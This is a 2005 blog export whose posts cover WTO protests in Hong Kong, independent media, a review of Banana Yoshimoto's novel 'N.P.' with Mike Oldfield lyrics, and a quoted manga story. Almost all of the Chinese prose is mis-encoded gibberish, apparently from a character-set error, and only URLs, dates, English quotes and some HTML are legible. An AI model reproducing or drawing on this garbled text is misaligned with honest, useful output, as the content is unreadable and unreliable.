/>WTO±N«שִע¦b§­ּ¥ֽ¬¡¦U­׃¼h­±¶i¦ז­t­±¼vֵT¡I­Y§­ּ₪£¥¿µר¡A¨ֳ±q¥¿­±¶i¦ז₪ְֿ»¡A¥פ¥ׁ¥xֶW¬F©²©}×A©ף¥‏²y₪ֶ«ה÷₪־±j°ך¾§ֻ₪U¡A¥¼¨׃§­ּ₪־₪l®]±N­±¹ן¨ל«ח¼ֻ×÷¥ֽ¬¡³B¹ׂ¡H <br /> <br />₪ֿWTO¹B°¡A₪£¥uֱn´©¥L₪H¡A¦׃¬O¦b«O½ֳ¦¨­×÷°·±d₪־¥ֽ¦sֵv¡I <br />ֵw×ן³s¸pֱn´©¥¼¨׃±N«שִע×÷₪ֿWTO¹B°₪־³Q®·₪H₪h¡I <br /> <br /><li>³s¸p¶D¨D <br />1.WTO¬O¸gְ±j°ך«I²₪¸gְ®z°ך×÷¼ֹ₪O₪ג¬q¡A₪H¥ֱ¦³§¼ֵֹv¡I <br /> ִ‏³d­»´ה¬F©²¥H²¼ֹ₪ג¬qֲםְ£¹A¥ֱ/₪u₪H/×ְ¹B/¾ַ¥ֽ¡I <br />2.₪ֿ¹ןWTO³y¦¨¥‏²y₪ֶ³h´I®t¶ZֲX₪j¡A₪ֿ¹ןWTO³y¦¨®z°ך₪p¹A₪־¥~³ׂ₪Hֵv¾D­י«d¡I <br />3.®ֲ½ֳ₪½¥ֱ°·±dֵv₪־¥ֽ¦sֵv¡I­n¨D¥xֶW¬F©²¥§Y¹ן¥״«eWTO¬Fµ¦¶i¦זְֻ°Q¡I <br /> <br /></ul> <br /> <br />---- <br /> <br /><b>ֱn´©§ץ«״¸¡I¡u¥xֶW¨}₪¡vְR§₪¦ז°¡ד</b> <br /> <br />¶}©l®ֹ¶¡¡G12₪כ21₪י₪W₪ָ₪QֲI <br /> <br />¦aֲI¡G¥xֶW₪j¾ַ·s¥ֽ«n¸פ¥¿×ש₪f <br /> <br />µo°_³ז¦ל¡G¥x₪j₪j¾ַ·s»D×ְ¡B¬F₪j÷״₪l×ְ¡B×F§d₪Hֵv¾ַµ{¡B¥_₪j«C¦~×ְ¡B₪u©e·|¡B₪י₪י¬Kֳצֳh₪¬§U¨ף·|¡B¥xֶW₪Hֵv«P¶i·|µ¥¡K <br /> <br />¦ז°₪÷®e¡G¦´ה×נ¥x¥«ֲ₪H₪h²{¨­»¡×k¡B₪j¾ַ¥ְֽR§₪ֱn´©§ץ«״¸¦ז° <br /> <br />¶D¨D¡G <br /> <br />₪@¡B ִ‏³d¥_¨­»´ה¬F©²₪£·ם¶e®·¡I <br /> <br />®¾¨j³Q­»´ה¬F©²ְִ©ס×÷¥«ֲ₪H₪h×ם¥¡A­»´הִµ₪ט­n¨D¥«ֲ¸s²³¸ׁ´²×÷¼s¼½¡A¦h¼ֶ¬O¥H¸f»y©ס°e¡A°¸÷¸₪~§¨ֲר¨ַ³\ֵ¥₪£²M·¡×÷­^₪ו¡A®¥»₪£²M·¡ִµ₪ט·N¹ֿ¡C³¡₪ְ×¾¾וִµ₪ט§Y±N±ִ¨ת±jµw§נ°ם×÷¥«ֲ¸s²³¡A₪]´¿¹ֱ¸ױֲק¶}¸T¨מ°ֿ¡AµL©`¦ף­»´הִµ₪ט¥u×ײֵ‎­»´ה¥«¥ֱֲק¶}¡A¥~°ך¥«ֲ×ּ®¥»µL×kֲק¶}²{³ץ¡I¥«ֲ×ּ¨ֳ«D©µ´¸ׁ´²¡A¦׃¬O´הִµ®¥»₪£ֵ‎¥«ֲ×ֲּק¶}¡A±ִ¨ת©כ®·¦ז°«ב¦Aµw®M₪W¡u«D×k¶°·|¡A©µ´ֵX´²¡v¸o¦W¡I <br /> <br />₪G¡B ִ‏³d¥_¨­»´ה¬F©²ֳ¹ֲ´₪£¹ך¸o׬¡I <br /> <br />­»´ה´Cֵי»P¥«ֲ₪H₪h₪@­P«¥X¡A¥«ֲ₪H₪h¦b­±¹ן´הִµ¶e®·®ֹ¡A¨ֳ¥¼±ִ¨ת×Z¸ֻ½ִ¬נ¡A¦׃¬O¥­ְR×÷°µ÷q¦±¡A¥״°e¦P§׃³Q¬[₪W©כ®·¨®«ב±a¨«¡C¨j¦­»´ה×נ¥x¦P§׃×ם¥¡A·ם®ֹ§ץ«״¸´N§₪¦b¥L¨­ֳה¡A¥­©M×÷±µ¨¶e®·¡A¨ֳ¥¼¦³¦p´הִµ©ׂ¨¥×÷¡uֵ§ִµ¡v₪־¡u·´ֳa₪½×«¡v¸o׬¡I <br /> <br />₪T¡B ¥_¨­»´ה¬F©²§Y¨ט§ןµ½©כ¯d©ׂ·׃ֵU¡I <br /> <br />­W³ׂ÷פ¯µ®ׁ×ר®]½a²z×ם¥¡A¥L­ּ₪w¦b­»´ה₪ֽ₪H×÷¨ף§U₪§₪U¡A»P«״¸¨ת±oֱpֳ´¡C«״¸»¡¡A´הִµ«D¦‎₪£µ¹¥L´ײ³Q¡Aֱ₪£µoµ¹¥L¥~®M¡Aֵ‎«״¸¥u¯א«j±j©µ₪@±ר₪ע´א»P§C·ֵ¹ן§¡C§ף­«­n×÷¬O¡A´הִµ¨S¦¬«״¸×÷²´ֳט¡Aֵ‎¥L¦b©כ¯d©ׂ₪₪₪°»ע³£¬₪£²M·¡¡C¦¹¥~¡A®¾­»´ה´Cֵי³ר¾ֹ¡A³Q®·¥«ֲ×ּ«e´X₪ׁ³£¬O¬~§N₪פ¾‏¡Aֱ¬O¸ך²`«®v§ץ¬W»¬°¥«ֲ×ּ₪W¶D¡A₪~×§¨ת¨ל¼צ₪פ¾‏¥i¬~¡I <br /> <br />¥|¡B ¥_¨­»´ה¬F©²§Y¨טְִ©ס14¦W¥xֱת₪י₪₪µL¶d¥«ֲ×ּ¡I <br /> <br />´הִµ₪£¥¿¸q×÷¶e®·©M¼f²z¡A¥¿¦ו²O²O×÷ֲ\¦b§­ּ²´«e¡C§­ּ©Iֶ~¥xֶW×ְ·|¡A²´«e₪£¶ְָ³¿n·¥±ֿ´©¥xֶW¾ַ¥ֽ§ץ«״¸¡A§ףְ³ֱn´©¨ה¥L13¦W»P§­ּ₪£¦P°ךִy×÷¨­¢®`×ּ¡Aֵ‎¡u₪Hֵv¥°ך¡v₪f¸¹₪£¥u¬O×ֵ½ֽ¡A§ף¬O¯א¸¨¹ך©ף°ך»×ְ·|×÷¦ז°¡I <br /> <br /> <br /> <br />₪j·s×ְ·s»Dֱpµ¸₪H¡G <br /> <br />³\³ױ¥פ¡G 0921 ¡V 606434 <br /> <br />ײ³ֽ²N¡G 0916 ¡V 220097 - http://www.upsaid.com/isis/index.php?action=viewcom&id=230 - isis - 2005-12-21T20:48:54+07:00 - 0 - - - ¡CindyTV? - ³s₪י©b×iֲו°|¡C¥¼¯א¦­»´ה®¥³{¨ה³׃¡A¥u¯אµ¶µ¶¿W»y₪F¡C <br /> <br />³°ִע¦¬¨ל¨׃¦ֳצ₪­»´ה₪ֿWTO¦ז°¶iµ{×÷×B₪ֽ¨׃«H¡C¦p₪ץ¦p²‏×÷§ִ³¦ז°₪§¥~¡A¦¹¦¸½ׁ¦h<a href="http://swtop.blogspot.com" target="_blank">₪₪₪ו÷פ¯¸₪W§ף§Y®ֹ©ס₪W¬ֳצ¼v¹³»Pµo§G₪ו¦r¸ך®ֶ¡B¦ך³s</a>¡A¨ֿ₪H·P¨ל₪₪₪ו¥@¬ֹ¿W¥´Cֵי§ף¨£ְֶ¥ת¡C <br /> <br />[more...]¨ג₪T¦~«e¡A»P×B₪ֽ¬[³]×÷TW indymedia¦]¬°÷״÷״­ל¦]¡]¥iֲk¯ַ¬°¯¥F¸ך·½»P₪H₪O¡^ְֱ¸m¡C²{¦b²׳©ף­«¿U§ֶ±ז¡C©¼®ֹ¡A¬D₪F₪@®M¹ן¼ֶ¦ל¸¨®t³ּ±׃·P¡A¹ן¨ֿ¥־×ּ³ּ₪ֽµ½¡A₪ה´©³ּ¦h¦h´Cֵיְֹ®׳®ז¦¡ֳ‏«¬×÷dadaimc¬[³]¡A¦]¬°²ִ₪@½u×÷¦h´Cֵי¸ך®ֶ₪ס₪ו¦r§ף»­n₪ֽµ½×÷₪¶­±»P₪ה´©¡C¡]¨÷®ֹ¡Aֱ¦³®M¯ֳ¬ש§«ָ¼g×÷imc¨t²־¡A¦b§«ָ¬¾ַ¼׀·ַ₪U¡A³o®M¨t²־¥u₪ה´©ogg¡C«y«y¡Aֵׁ¦ְ°₪@¨ַ¯ף®NGOµoֳר¡A¸»¡¹C¦ז«ב¦U­׃¨׃·½×÷²³®aְֹ®׳®ז¦¡¯ֲֹר¡A¦b·ם₪U¯א³ּ§ײ±o¨ל´²§G®ִ¯q×÷¡A₪~¬O¹ן¦ז°³ּ¦³®ִ×÷¨t²־¡C¦h´Cֵיְֹ®׳®ז¦¡₪£²־₪@×÷³d¥פ¡A₪£¸׃¥ׁ₪@¯כ¨ֿ¥־×ּ·§¬A©׃¨¡C¡^ <br /> <br />₪µ₪ׁ«ך¥©ֱ@¨ל Naomi Klein ¦b <a href="http://www.iwtnews.com/" target="_blank">Independent World Television</a> ₪W×÷<a href="http://www.iwtnews.com/videoplayer/naomiklein" target="_blank">³X°₪ש¬q</a>¡C·Pִ±±µִע¦o<a href="http://www.upsaid.com/isis/index.php?action=viewcom&id=185" target="_blank">¥‎«e₪ֿ¾װ₪ו³¹</a>«ה¸פ¡A½ֽ½׳"amplifying effect"¡C<a href="http://www.smartmobs.com/archive/2005/12/18/naomi_klein_on_.html" target="_blank">smart mobs</a>₪­zNaomi Klein³X°₪@¬q¡G"We need this amplifying effect that really seems to only come from television... We can do independent media on the cheap but we can¡¦t do independent television on the cheap.¡¨ (From the Birth of a network video) <br /> <br />¦b³o₪ג¾ק¡Bִב¼v¾ק¡B¼v­µ¾¹§ק¶V¥[»´ֱ¡¥iִג×÷¦~¥N¡A²³ֱn³¼M¬O¥²µM₪§¶ױ¡C¦‎₪ֶֿ[₪§«e <a href="http://www.indymedia.org" target="_blank">indymedia</a> ­²©R₪´¥¼¦¨¥\×÷½u₪W¼s¼½¡BwebTV¹ֱ¸ױ¡ANaomi Klein ¨ה¹ך¹D¥X¨ה₪@­«ֲI¡C¨÷»ע¡A₪µ¦~·sֱֽ¶ױ <a href="http://video.google.com/" target="_blank">Google Video</a>¡B<a href="http://odeo.com/" target="_blank">Odeo</a>(FYI, Odeo Channel <a href="http://odeo.com/channel/32489/view" target="_blank">Radio Hong Kong</a>)·|¬O·s×÷ְ³´÷¸ׁ¨M₪ט®׳¶¡H©־¬Oµ²¦X₪§³B§ף¨ֿ₪H¬¶i¼ֶ¦ל¸¨®t¡H <br /> <br />see also: indymedia | <a href="http://www.indymedia.org/en/2005/12/829714.shtml" target="_blank">Mass protests meet WTO in Hong Kong</a> <br /> <br />related posts: <br /><a href="http://www.upsaid.com/isis/index.php?action=viewcom&id=110" target="_blank">¡CFreedom Fires :: ¦¥ׁ₪§₪ץ</a> ִ¶¼g / ±d¹חִֹ <br /><a href="http://www.upsaid.com/isis/index.php?action=viewcom&id=111" target="_blank">¡CIntifada, Iraqi Style :: ¥ל©װ§J­·®ז×÷´N¦a°_¸q</a> ִ¶¼g / ±d¹חִֹ <br /><a href="http://www.upsaid.com/isis/index.php?action=viewcom&id=185" target="_blank">¡C¦p¦ף₪מ¾װ :: How to End the War</a> ִ¶¼g / ±d¹חִֹ <br /> - http://www.upsaid.com/isis/index.php?action=viewcom&id=229 - isis - 2005-12-21T04:37:45+07:00 - 0 - - - ¡C×u¸פ®ָµ{¦p÷q¿ֵֶ - <br /> <br />₪Uµ₪p«B×÷©]±¡A¦P¨ְֶ°¦£±q³ר×ְ±a¦^§O₪H°e§×÷¥ֽ₪י³J¿|¡A¼µ₪W³¡A§¨«¥X®a×ש₪U₪s»ג¦^ֲ§×«¡C×ן­±¦׃¨׃±y´­×÷¼ײ­µ¡A©Mµ«Bֱn¡A°jְת₪s«°¼׃¦t¶¡¡A§½w₪F¸}¨B¾n¨¬¶ֵֹ¥¡AְRְR×÷¬f×o¸פ₪W¥u¦³§¡Aֱ¦³₪@¦a¬y¬××÷«B¡C <br /> <br />³o¬O³ּ¦n×÷¥ֽ₪יֲ§×«₪F¡C¥©¹J₪@­÷₪ֲֿ׀÷t«µ¥R÷¡¦^¾׀×÷÷q¦±¡A§»P÷t«µ×ּ¬O₪¬₪£¬ֳׁ×÷­¯¥ֽ₪H¡A§­ּ₪§¶¡¥u¦³₪s«°¸ּ·L´H×÷×ֵ®נ¡A¦³©]¡C <br /> <br /> <br /> <br />[more...]¼ֶ₪י«ב¡A©¹×נ°×«ֲו°|×÷³~₪₪¡A­pµ{¨®¼½©ס¥ׂ´ֲ־¼ײ¹־×÷ Hey Jude¡A¦¿¬µXֲש₪ג×÷·ֵ¬X¡C¼s¼½¸ּ®®¦ױ×÷¥D«ש₪Hֱn»¡µ Hey Jude ÷q¦W¨׃¥ׁ¡A¬O­׃·R±¡¬G¨ֶ¡C§°O±o¡C¨÷¬O¦h»ע»»»·×÷¬G¨ֶ¡C <br /> <br />₪¸ּ¥u¦A¦¸²`¨ט¦a·P¨¨ל¦₪v¹ך¦bµL×k·׃ֵU¦n®a¸ּ©ׂ¦³¦¬¾i×÷¬y®צ°×«¡A¼ֶ¶q»·¶W¹L­t¾ב­­«׳¡CµL½׳§×÷·׃ֵU₪ס₪§±`÷A₪w÷ג÷÷ֹ₪₪O¡A¨C¦¸¨C¦¸¡A°×«ֲק¶}§₪§«ב¡A¯d₪U×÷ֱ¬O²`²`×÷¦³d»P¾ׂ®¬¡C¥ֽ¦÷«´ֱן¥[₪§©R¹B²§±`₪£¶¶¹E¡A¦h¦~²ײ¿n×÷ְ£₪O¨ֿ§®ֹ±`÷כ¯«µA´²¡C <br /> <br />₪S¹Lµ¦b°×«ֲו°|³­¦ס°×«¥´ֲI÷w×÷¥ֽ¬¡¡C <br /> <br />¨C¦~¥ֽ₪י₪§¶¡¡Aֱ©ת¥ױ¨C¬q±«×÷¥ס½u¡C <br /> <br />§°J₪·Pֱֲ¦³₪H¹L₪F₪Q¦h¦~ֱ°O±o°e§¥ֽ₪י³J¿|¡A·Pֱֲ₪@¨ַ±¾₪§×÷×B₪ֽ¡A·Pֱֲ×¾¹D§¨­₪­ׁ¯h®ֹ®ֱֹ¬ש§´²₪×÷×B₪ֽ¡A·Pֱֲ¨÷¨ַ×ײ©w°«O×÷×B₪ֽ......¥i¬O§»­n×÷¡A₪£¬OֲA×ב¡A₪£¬O³J¿|¡A₪]₪£¬O´²₪¡A§»­n¦³₪Hְ°§U§ֵ‎°×«­ּ§ה¨ל¥O₪H¦w₪×÷·s®a¡C <br /> <br />¥ׁ©ף§×¬×p₪£¨־¡A¨S¦³¥ז³q₪u¨ד¡]₪j²³¹B¿י₪u¨ד¹ן°×«¦h»ע₪£₪ֽµ½¡^¡A²{¦b₪]¯₪ײ¬¾ק¡A¦³®ֹ¯װְֱ₪F°e¾i¬yµ{¡A¦p×G¦³₪Hִ@·Nְ°¦£¡A·P¿E₪£÷ֹ¡C <br /> <br /> <br /> <br /> - http://www.upsaid.com/isis/index.php?action=viewcom&id=228 - isis - 2005-12-12T09:00:31+07:00 - 2 - - - ¡CNorthpoint - <br />­«ֵ¥¦ׁ÷q Northpoint¡A¾׀°_¬J©¹®ׁµ¡C₪£¨s¡C <br /> <br />­ֻ¬O¥_¨₪₪G¦r¡A©ף₪µ¨£₪§³÷®{¥ֽ·ֹ®ב₪§·P¡C <br />[more...]<blockquote> <br /><b>°±¨B©ףµךµL²`²W«e <br />ְר¶ֻ§@®a×÷¾Aְ³·s¥@¬ֹ¯g­װ₪§§@¡G¡mN¡EP¡n</b> <br /> <br />¥»₪ו¥Z©ף<a href="http://www.pots.com.tw" target="_blank">¯}¶g³ר</a> <br />2002.Nov. <br /> <br />®ׁ¦W¡G¡mN¡DP¡n <br />§@×ּ¡G¦N¥»×®R®R <br />ִ¶×ּ¡G§dִ~₪ו <br />¥Xש¡G®ֹ³ר <br /> <br />₪ו¡‏±d¹חִֹ <br /> <br />Have you ever been to Northpoint <br />to spend your time and pray <br />the prison walls are dark and cold and grey <br />the writing on the wall at Northpoint <br />speaks to a silent room <br />they shut the bars down, leave you to the gloom <br />------Artist/ Mike Oldfield , Album/ Islands, Song/ Northpoint <br /> <br />¡@¡@´¿´X¦ף®ֹ¡A₪י¥»÷Z¾P₪p»¡×÷®ׁ¦Wֱ`©M1960~1980¦~¥N×÷¦ט¬v÷q¦±¦W²זֲק₪£₪Fֳצ«Y¡A¥‎«e¦³§ר₪W¬K¾נ¨ת¦©ְY¥|×÷¡m®¿«ֲ×÷´ֻ×L¡n¡A¨ת¦ְן₪h¼ײ×÷¡m¶}©¹₪₪°ך×÷÷C²מ¡n¡]¡qOn a slow boat to China¡r¡^¡Aµu½g¡q1963/1982¦~×÷¥ל©¬₪÷÷¿©h®Q¡r¨׃¦µ¦WBossa Nova ¡qThe Girl From Ipanema¡r¡A¦N¥»₪®R®R³o¥»®ׁ¦W¡mN¡DP¡n¡A§Y¬O1987¦~­^°ך¹q₪l­µ¼ײְsְY³׀§@×ּMike Oldfield×÷÷q¦±¡qNorthpoint¡rֱY¼g¡Cֵ××ּ¦b³o¨ַ¬J¦³ֳhֲֲ¥\¥־₪S¯א­«·s₪»ג¬y¦ז×÷®ׁ¦W₪₪¡A₪£×¾¬O§_§ה¨ל¨ַ³\¦@·P¡H¦‎¥i¥H×ײ©w×÷¬O¡A³o¨ַ₪p»¡¥»¥»÷Z¾P¡A©־³\¦p¦P§ר₪Wְs¦b§@«~¸ׁ»¡¸ּ»¡×÷¡A¦N¥»×®R®R»P¦o×÷ֵ××ּ­ּ¡A¡u³£¬O³B©ף¦b×ְ·|·s§־÷A¡B·s׬×p¨׃ֱ{₪§«e×÷¶¥¬q¡AµL·Nֳׁ¦a¥H¦U÷״₪ט¦¡¾ַµ½ױ¾A×÷¡u«e¾Aְ³´ֱ¡v×÷±¸s¡v¡A¦׃³o¨ַ«e¾Aְ³´ֱ×÷±¸s¡A©־³\»­n¦ׁ÷q¨׃§@¬°¦¨­©w¸g½n×÷ֳ¹½L§a¡C <br />¡@¡@ <br />¡@¡@¦‎¥H¦ט¬v÷q¦W¬°®ׁ¦W×÷­·¼י¡A¦¥G₪]»P₪י¥»¯S¦³×÷¬«¦ט₪ט₪ו₪ֶ×÷₪ט¦¡₪£µL₪z«Y¡A₪@¨ג¦~¨׃₪י₪ו₪p»¡¸ּ¥X²{×÷¡u¦ט₪ט¡v¡]­µ¼ײ₪§¥~¡A±¡¸`¸ּ×÷²§°ךֵ±¡¡B¸ף¦a°ל×÷±¡¸`¬y°¡B¥~¨׃»yµ¥µ¥¡^¡A¦­₪w¥O₪H²´×ב¼÷¶ֳ¡C§ר₪Wְs»¡¥»®ׁ¬O¦N¥»×®R®R²ִ₪@¦¸¡u¦³©ׂ¬°¡v¼g¥X¨׃×÷§@«~¡A²ִ₪@¦¸·Nֳׁ¨ל¦o₪÷¦b¼חֲֳ×÷¡u±¡³ר¡v(data)¡A¨ֳ±N¨¬¥Hµo°¦o©ׂ¦³×÷₪~µ״»P§³N×÷³o¨ַ¡u±¡³ר¡v¥־÷ֹ¥‏₪O×ם²{₪F¥X¨׃¡C§«o¥H¬°±q¦­´ֱ×®R®R¯S¦³×÷ֳD§ק¿ן¾¥H¨׃¡]₪k¦P§׃¡B¶ֳ­¡B₪¹q·Pְ³¡B²¾±¡§@¥־¡B¯«¯µ¾ַ¡B©v±׀µ¥µ¥¡^¡A¥»®ׁ¨ֳ«D¦o³ּ¦³©ׂ¬°×÷§@«~¡C§ר₪Wְs©ׂ¿׳×÷data¡A¬¦b§¾|¶w×÷²´₪₪¡A¦¨₪F¦U¦¡¦ט₪ט₪ו¾ַ¹q¼v¯ְ§ק¡]¦p²ן₪h₪ס¨ָ¡B¯ַ×i¬_₪ׂ¡BAlexandro Jodorowskyµ¥¡^×÷ֲרְם¡A¥i«o¬O­׃²iµN¶¡¬₪¬₪£₪J¨‎×÷§@«~¡C×®R®R¨C¿ן¾×§ִ³©°××÷ֳD§ק§@¬°¼g§@°©·F¡A§­ּ©־¥i²z¸ׁ¦¨¬Y÷״₪»₪µ²{¥N×ְ·|₪₪¦]¸ך°T¥R¥¸¦׃¯h¥F×÷ֵ××ּ×÷₪ט×k¡A¥¿¦]¦p¦¹¡A¦p¦ף¸אְִ³o¨ֳַD§ק₪~§ף¦ֵׂח§@×ּ×÷¥־₪»P¹ך₪O¡C <br />¡@¡@ <br />¡@¡@¡mN¡DP¡n¸ּ×÷×µׁ¡A¬¡²ז¬OLolita×÷²{¥Nש¥»¡A₪£¶ָ³Q±‎±ז¡A₪]¦b¶ֳ­₪₪±‎±זµ₪ק¿ֻ»P­פ­פ¡C®ׁ¸ֱּצµM¥R÷¡©_©ַ×÷ֵ±¡¡A¦‎«ח»ע¬³£₪£¬O¦b½ֽ·R±¡¡A₪ֿ¦׃¬O¦b§ה´M¥ֽ¦s₪§¹D¡A₪@÷״¬÷ֹ¦U¦¡±‎±ז¡B·ֹ®ב«ב¡A¯אֵ‎¦₪v¥ֽ¦s×÷¡A«o¦³¨ַ×Q×÷«ה¦ׂ¼ׂ¦¡¡C×®R®R¦b¥»®ׁ₪₪¥uµ¹₪Fֵ××ּ®ׁ¦W×÷½u¯ֱ¡A±q¥¼¦b®ׁ₪₪₪¥XNorthpoint÷qµ¡A₪£¹L´N÷qµ¬¨׃¡A÷÷»¡BֵKµ·÷פ¡B¨S¦³¦^ְ³×÷§o³»P­z»¡¡A¨ה¹ך¥¿¬O²{¥N×ְ·|²{¥N₪H¹ן²¨ֲק×÷·Pִ±¡B²§₪ֶ×÷¼g·׃¡A¥»®ׁ×÷µ²§½ֱצµM₪£¬ֶ¥O₪H÷¡·N¡Aֱ`ִ±±o₪׃¡uֲ²³ז¡v₪F¨ַ¡A₪£¹L³o₪j·§₪]¬O×®R®R¦ף¥H³Qֲkֳ‏¦¨¡uְר¶ֻ¨t¡v§@®a×÷½t¬G-------¼g¥X²{¹ך×÷´»ֵ«ב¡A₪Sµ¹₪Fֵ××ּ₪@½u¥ֽ¾ק¡A¦׃₪£¦V¨÷µךµL×÷²`²Wִ~ִע¦ז¥h¡A₪]¬O¦N¥»×®R®R×÷§@«~¼צ½ז­ל¦]₪§₪@¡C <br />¡@¡@ <br />¡@¡@¥t₪@¦³½ל₪§³B¡A¦b©ף¥»®ׁµ¾¥¬ֶ¦h×÷¡uֲ½ִ¶¡v¡A­^₪ו»P₪י₪ו¶¡×÷ֲא´«©װ¥X¥D­n¬G¨ֶ¶b½u¡A¬G¨ֶ₪§¥~¡A₪]ֵ‎§­ּ¿s×¾×®R®R¹ןֲ½ִ¶₪־₪י₪ו§@¬°₪@÷״¼g§@»y¨¥×÷·Q×k¡A©M¥H§ר₪Wְs¦b¸ׁ»¡¸ּ¹ן₪י₪ו°h₪ֶ×÷₪£÷¡¡A¬×÷|¥X§@®a­ֱּצ§ג¡u¦ט₪ט¡v¦¬¯ַ¶i§@«~₪₪¡A«o₪]¹ן¦¹¦³µµJ¼{¡A¯S§O¬O₪י¥»¥ֱ±©×÷₪ֿ¬¡A₪ֿ¬M¥X₪י¥»₪H¨÷÷״¹ן¬ֶ»ע¨ֶ³£·¥«׳»{¯u×÷©®ז¡A«ך¦n»P¦ט₪ט¦¯ַ³Q¯כ×÷®ִׁy¥«³ץ§־¦¨₪@©_²§¦׃¿״¨כ×÷₪ֿ®t¡C§@®a₪]¦b´M§ה¥ֽ¦s₪§¹D¡A³o₪£·N¥~¡A₪£¹L¡A₪ֿµר¦N¥»×®R®R¦­´ֱ×÷§@«~¡A¥i±₪¡mN¡DP¡n¨S¦³¦³©ׂ¬°¦aµo´§¦o´y¼g²׃½o₪²z×÷±M×ר¡A¦׃¬y«U₪F¨ַ¡C <br />¡@¡@ <br />¡@¡@ֵ¥µNorthpoint¡A₪@­÷¦N¥»×®R®R»{¬°¬O«D±`«s¶ֻ×÷¦ׁ÷q¡A¦µL²ב¿א¦a¬נµo©_·Q¡A₪U₪@¦¸¡A₪]³\§ג÷q¦±³s¦P®ׁ¥»₪@¨ײµo°ג¡Aְ³¦³§U©ףֵ××ּ×÷·Q¹³»P²z¸ׁ¡C¹ן§a¡A«ח¯א´ֱ«ֵ××ּ­ּ³£¬O¼פ×¾¦ט¬v­µ¼ײ×÷¼ײ°g©O¡H <br /> <br /></blockquote> - http://www.upsaid.com/isis/index.php?action=viewcom&id=227 - isis - 2005-11-24T09:11:21+07:00 - 0 - - - ¡C¶}¨ל²‏קף - ²צ§י²‏קף¡A¥B¯d¨ת¡B₪@₪ְ¬K¦ג¡Cֱ°O±o¡A«C±צ¦p¨§¡A¦@¥ל¦P÷K¡C₪ײ₪י¹ן×ב´‎¾K¹¡A¦׃₪µ¿פ²´¬­·₪כ¡C«כ¨d₪¦¡B¯÷§­×F­·¡AְY¦p³·¡C ·®²ף°}¡Au»Z¸­¡C®ֹ¸`´«¡Aֱcµ״·²¡C÷ג«ח¸T­·«B¡A«ח¸Tסֿ&#40194;¡I¦ׁ¥T¥T₪¼×ב¦@¬h¡A¬O´ֿ´ֿ×ּ¸ֱ©M½÷¡C₪]₪£¦]¡B¬K¥h¦³¶¢·T¡A¦]ֲק§O¡C[more...]¦P¡uִU§g§ף÷ֹ₪@×M°s¡A¦ט¥X¶§ֳצµL¬G₪H¡v»»»»©Iְ³¡C·¬O¦³½ל¡C - http://www.upsaid.com/isis/index.php?action=viewcom&id=226 - isis - 2005-11-16T08:15:01+07:00 - 0 - - - ¡C¥ז´« - <div style="border: 1px solid #cccccc; background-color: white; width: 115px; text-align: center; padding: 0 0 10px 0;"><p style="margin: 0"><img src="http://static.flickr.com/23/25822676_789bf55448_t.jpg" style="border:0;"> <br /> <span style="font-size: 11px;">My <a href="http://upsaid.com/isis">blog</a> is worth <b>$37,824.18</b>.</span> <br /><span style="font-size: 10px;"><a href="http://www.business-opportunities.biz/projects/how-much-is-your-blog-worth/">How much is your blog worth?</a></span></p><p><a href="http://www.technorati.com/" style="border: 0px;"><img src="http://technorati.com/pix/tech-logo-embed.gif" style="border: 0px;"></a></p></div> <br /> <br />¦p×G»ש­ָ¥i¥H¥ז´«¡C <br /> <br />[more...]·Q¥h°ך¹ׂ₪§«n±´³X¥dֵ¡C¦ט¯Z₪תֱ¦³°×²ִ¡C <br />°µ₪@­׃¹₪₪¹¡C¥ֳ»·§O½ס¶i·®¾נµף¡C <br />¾l¼ֶ¬Oֲא¨­«ב©לµ×÷¼v₪l¡Cֲק¶}×÷¥¼´¿ֲק¶}¡C <br /> <br /> <br />₪ׁ³±®ֹ§·|»¡¡A¦­×¾¹D§O¥ז´«´N¦n¡C <br />₪ׁ´¸®ֹ§·|»¡¡A¦­×¾¹D¥ז´«´N¦n¡C - http://www.upsaid.com/isis/index.php?action=viewcom&id=225 - isis - 2005-11-12T11:25:36+07:00 - 1 - - - ¡C¦W¦r - ×B₪ֽ§i¶D§¡A¨ת₪F·s¦W¦r¡C <br />[more...]®ת¿A×½¾נ×÷÷©µe¡mMonster¡n¸ּ¡A¦³­׃ֳצ©ף¦W¦r×÷±¶§Jµ£¸¡C <br /> <br /><blockquote> <br />«₪[«₪[¥H«e¡A¦b¬Y­׃¦a₪ט¡A¦³°¦¨S¦³¦W¦r×÷©ַ׫¡C <br />©ַ׫«D±`«D±`·Q­n₪@­׃¦W¦r¡C <br />©ׂ¥H©ַ׫´N½ס₪W®ָ³~¡A¥h´M§ה¦W¦r¡C <br />¦‎¬O¡A¦]¬°¥@¬ֹ«₪j¡A <br />©ׂ¥H©ַ׫´N₪ְµץ¦¨¨ג°¦¡A½ס₪W®ָ³~¡C <br />₪@°¦©¹×F¡A <br />₪@°¦©¹¦ט¡C <br />©¹×F¨«×÷©ַ׫¡A§ה¨ל₪@­׃§ר²ר¡C <br /> <br />¡uֵK¦K§B§B¡A½׀§ג§A×÷¦W¦rµ¹§¡C¡v <br />¡y¦W¦r«ח»ע¯אµ¹₪H¡C¡z <br />¡u¦p×G§ג¦W¦rµ¹§×÷¸¡A§´N¨ל§B§B×÷¨­ֵי¸ּ¡Aֵ‎§A₪O®נֵ₪j·ם§@ֱֲֲ§¡C¡v <br />¡y¯u×÷¶¡A¦p×G₪O®נֵ±j₪F¡A´N§ג¦W¦rµ¹§A§a¡C¡z <br /> <br />©ַ׫´N¶i¨לֵK¦K×÷¨­ֵי¸ּ¥h₪F¡C <br />©ַ׫ֵ¦¨₪FֵK¦K¶ר¹ֿ¡C <br />¶ר¹ֿ¦¨₪F§ר₪l¸ּ₪O®נ³ּ₪j×÷₪H¡C¦‎¬O¡A¦³₪@₪ׁ¡A <br /> <br />¡u¬¬§¡I¬¬§¡I§¨­ֵי¸ּ×÷©ַ׫₪w¸g×ר±o³o»ע₪j₪F®@¡C¡v <br /> <br />¥d­ש¥d­ש¡A©B¼T©B¼T¡A¹ַ§s¹ַ§s¡A©B¹¡C <br />¨{₪l¾j×÷©ַ׫¡A±q¨­ֵי¸ּ­±§ג¶ר¹ֿ¦Y±¼₪F¡C <br />©ַ׫₪Sֵ¦^₪F¨S¦³¦W¦r×÷©ַ׫¡C <br />¨ל₪F¾c¦K÷~´µ×÷¨­ֵי¸ּ₪]₪@¼ֻ¡A <br />¥d­ש¥d­ש¡A©B¼T©B¼T¡A¹ַ§s¹ַ§s¡A©B¹¡C <br />₪Sֵ¦^₪F¨S¦³¦W¦r×÷©ַ׫¡C <br />¨ל₪Fֲy₪H´צ÷¿´µ×÷¨­ֵי¸ּ₪]₪@¼ֻ¡A <br />¥d­ש¥d­ש¡A©B¼T©B¼T¡A¹ַ§s¹ַ§s¡A©B¹¡C <br 